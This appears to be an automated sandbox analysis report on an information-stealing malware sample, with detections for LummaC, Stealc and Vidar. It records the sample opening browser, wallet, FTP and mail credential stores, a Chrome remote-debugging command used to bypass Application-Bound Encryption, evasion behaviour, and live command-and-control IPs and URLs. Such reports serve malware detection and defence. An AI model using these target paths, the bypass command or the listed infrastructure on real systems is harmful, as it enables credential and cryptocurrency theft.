Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Searches for user specific document files
Source: C:\Users\user\Documents\JKECGDBFCB.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Yara detected Credential Stealer
Source: Yara match File source: 00000013.00000003.2952766188.0000000000F74000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2978726048.0000000000F74000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.3033374446.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2952585223.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.3005504175.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.3033026272.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2977685689.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.3005248474.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7096, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: feb3d39b6a.exe PID: 6568, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: feb3d39b6a.exe PID: 5080, type: MEMORYSTR

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Yara detected Credential Flusher
Source: Yara match File source: Process Memory Space: 0d957dbf73.exe PID: 6256, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: feb3d39b6a.exe PID: 6568, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: feb3d39b6a.exe PID: 5080, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 00000014.00000002.3062536575.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.3252381859.00000000016EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.3244939214.0000000000BB1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3154801184.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2971078627.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2048185134.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2593553859.00000000001E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3069078994.0000000000BB1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2604363979.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7096, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 815f2a8fe8.exe PID: 7552, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 7096, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572052 Sample: file.exe Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 98 youtube.com 2->98 100 www.google.com 2->100 102 26 other IPs or domains 2->102 128 Suricata IDS alerts for network traffic 2->128 130 Found malware configuration 2->130 132 Malicious sample detected (through community Yara rule) 2->132 134 17 other signatures 2->134 9 skotes.exe 2->9         started        14 file.exe 36 2->14         started        16 feb3d39b6a.exe 2->16         started        18 6 other processes 2->18 signatures3 process4 dnsIp5 118 185.215.113.43, 49847, 49853, 49875 WHOLESALECONNECTIONSNL Portugal 9->118 120 31.41.244.11, 49859, 80 AEROEXPRESS-ASRU Russian Federation 9->120 76 C:\Users\user\AppData\...\57a07eec2d.exe, PE32 9->76 dropped 78 C:\Users\user\AppData\...\0d957dbf73.exe, PE32 9->78 dropped 80 C:\Users\user\AppData\...\815f2a8fe8.exe, PE32 9->80 dropped 88 7 other malicious files 9->88 dropped 170 Creates multiple autostart registry keys 9->170 172 Hides threads from debuggers 9->172 174 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->174 20 57a07eec2d.exe 9->20         started        23 feb3d39b6a.exe 9->23         started        26 2533b4b8c7.exe 9->26         started        36 2 other processes 9->36 122 185.215.113.206, 49704, 49725, 49763 WHOLESALECONNECTIONSNL Portugal 14->122 124 185.215.113.16, 49798, 49881, 80 WHOLESALECONNECTIONSNL Portugal 14->124 126 127.0.0.1 unknown unknown 14->126 82 C:\Users\user\Documents\JKECGDBFCB.exe, PE32 14->82 dropped 84 C:\Users\user\AppData\...\softokn3[1].dll, PE32 14->84 dropped 86 C:\Users\user\AppData\Local\...\random[1].exe, PE32 14->86 dropped 90 12 other files (8 malicious) 14->90 dropped 176 Detected unpacking (changes PE section rights) 14->176 178 Attempt to bypass Chrome Application-Bound Encryption 14->178 180 Drops PE files to the document folder of the user 14->180 190 6 other signatures 14->190 28 cmd.exe 1 14->28         started        30 msedge.exe 2 10 14->30         started        32 chrome.exe 8 14->32         started        182 Query firmware table information (likely to detect VMs) 16->182 184 Tries to harvest and steal ftp login credentials 16->184 186 Tries to harvest and steal browser information (history, passwords, etc) 16->186 188 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->188 34 firefox.exe 18->34         started        38 2 other processes 18->38 file6 signatures7 process8 dnsIp9 136 Multi AV Scanner detection for dropped file 20->136 138 Tries to detect sandboxes and other dynamic analysis tools (window names) 20->138 140 Modifies windows update settings 20->140 160 3 other signatures 20->160 104 atten-supporse.biz 104.21.16.1 CLOUDFLARENETUS United States 23->104 142 Detected unpacking (changes PE section rights) 23->142 144 Query firmware table information (likely to detect VMs) 23->144 146 Tries to evade debugger and weak emulator (self modifying code) 23->146 148 Tries to steal Crypto Currency Wallets 23->148 106 80.82.65.70 INT-NETWORKSC Netherlands 26->106 150 Hides threads from debuggers 26->150 152 Tries to detect sandboxes / dynamic malware analysis system (registry check) 26->152 154 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 26->154 40 JKECGDBFCB.exe 4 28->40         started        44 conhost.exe 28->44         started        156 Monitors registry run keys for changes 30->156 46 msedge.exe 30->46         started        108 192.168.2.5, 443, 49703, 49704 unknown unknown 32->108 110 239.255.255.250 unknown Reserved 32->110 48 chrome.exe 32->48         started        112 youtube.com 142.250.181.142 GOOGLEUS United States 34->112 114 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 GOOGLEUS United States 34->114 116 4 other IPs or domains 34->116 57 2 other processes 34->57 158 Binary is likely a compiled AutoIt script file 36->158 51 taskkill.exe 36->51         started        53 taskkill.exe 36->53         started        59 4 other processes 36->59 55 conhost.exe 38->55         started        signatures10 process11 dnsIp12 74 C:\Users\user\AppData\Local\...\skotes.exe, PE32 40->74 dropped 162 Detected unpacking (changes PE section rights) 40->162 164 Tries to evade debugger and weak emulator (self modifying code) 40->164 166 Tries to detect virtualization through RDTSC time measurements 40->166 168 4 other signatures 40->168 61 skotes.exe 40->61         started        92 plus.l.google.com 172.217.17.78, 443, 49728 GOOGLEUS United States 48->92 94 www.google.com 172.217.21.36, 443, 49708, 49709 GOOGLEUS United States 48->94 96 apis.google.com 48->96 64 conhost.exe 51->64         started        66 conhost.exe 53->66         started        68 conhost.exe 59->68         started        70 conhost.exe 59->70         started        72 conhost.exe 59->72         started        file13 signatures14 process15 signatures16 192 Detected unpacking (changes PE section rights) 61->192 194 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 61->194 196 Tries to evade debugger and weak emulator (self modifying code) 61->196 198 3 other signatures 61->198
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
80.82.65.70
 unknown Netherlands
202425 INT-NETWORKSC false
34.117.188.166
 contile.services.mozilla.com United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
172.217.21.36
 www.google.com United States
15169 GOOGLEUS false
31.41.244.11
 unknown Russian Federation
61974 AEROEXPRESS-ASRU false
104.21.16.1
 atten-supporse.biz United States
13335 CLOUDFLARENETUS false
172.217.17.78
 plus.l.google.com United States
15169 GOOGLEUS false
142.250.181.142
 youtube.com United States
15169 GOOGLEUS false
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
35.244.181.201
 prod.balrog.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
34.160.144.191
 prod.content-signature-chains.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false

Private

IP
192.168.2.5
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
plus.l.google.com 172.217.17.78 true
s-part-0035.t-0009.t-msedge.net 13.107.246.63 true
prod.remote-settings.prod.webservices.mozgcp.net 34.149.100.209 true
contile.services.mozilla.com 34.117.188.166 true
youtube.com 142.250.181.142 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
atten-supporse.biz 104.21.16.1 true
ipv4only.arpa 192.0.0.171 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
push.services.mozilla.com 34.107.243.93 true
www.google.com 172.217.21.36 true
telemetry-incoming.r53-2.services.mozilla.com 34.120.208.123 true
js.monitor.azure.com unknown unknown
spocs.getpocket.com unknown unknown
detectportal.firefox.com unknown unknown
mdec.nelreports.net unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown
firefox.settings.services.mozilla.com unknown unknown
shavar.services.mozilla.com unknown unknown
apis.google.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/ false
    		high
    formy-spill.biz false
      		high
      http://185.215.113.206/68b591d6548ec281/nss3.dll false
        		high
        https://atten-supporse.biz/api false
          		high
          atten-supporse.biz false
            		high
            dwell-exclaim.biz false
              		high
              http://80.82.65.70/dll/download false
                		high
                https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw false
                  		high